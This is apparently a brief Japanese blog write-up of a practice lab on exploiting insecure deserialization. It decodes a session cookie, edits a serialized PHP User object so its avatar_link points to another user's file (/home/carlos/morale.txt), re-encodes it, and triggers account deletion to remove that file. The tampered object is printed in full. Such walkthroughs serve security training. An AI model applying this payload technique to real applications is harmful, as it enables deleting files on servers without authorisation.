shikata ga nai

Private? There is no such things.

Using application functionality to exploit insecure deserializationをやってみた

Hello there, ('ω')ノ

 

アプリケーション機能を使用して安全でない逆シリアル化の悪用を。

まずは、ログインして。

 

f:id:ThisIsOne:20210218185448p:plain

 

My accountで、Delete accountを。

 

f:id:ThisIsOne:20210218185535p:plain

 

インターセプトして、Cookieをデコーダへ。

 

f:id:ThisIsOne:20210218185619p:plain

 

デコードした結果を以下のようディレクトリと文字数を変更して。

 

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"dkvew8nzaolj4hpua1yuo9vx7aih566d";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

 

f:id:ThisIsOne:20210218185717p:plain


今度は、逆にエンコードして。

 

f:id:ThisIsOne:20210218190956p:plain

 

エンコードしたCookieと入れ替えてインターセプトをオフにすると。

 

f:id:ThisIsOne:20210218190840p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210218190906p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain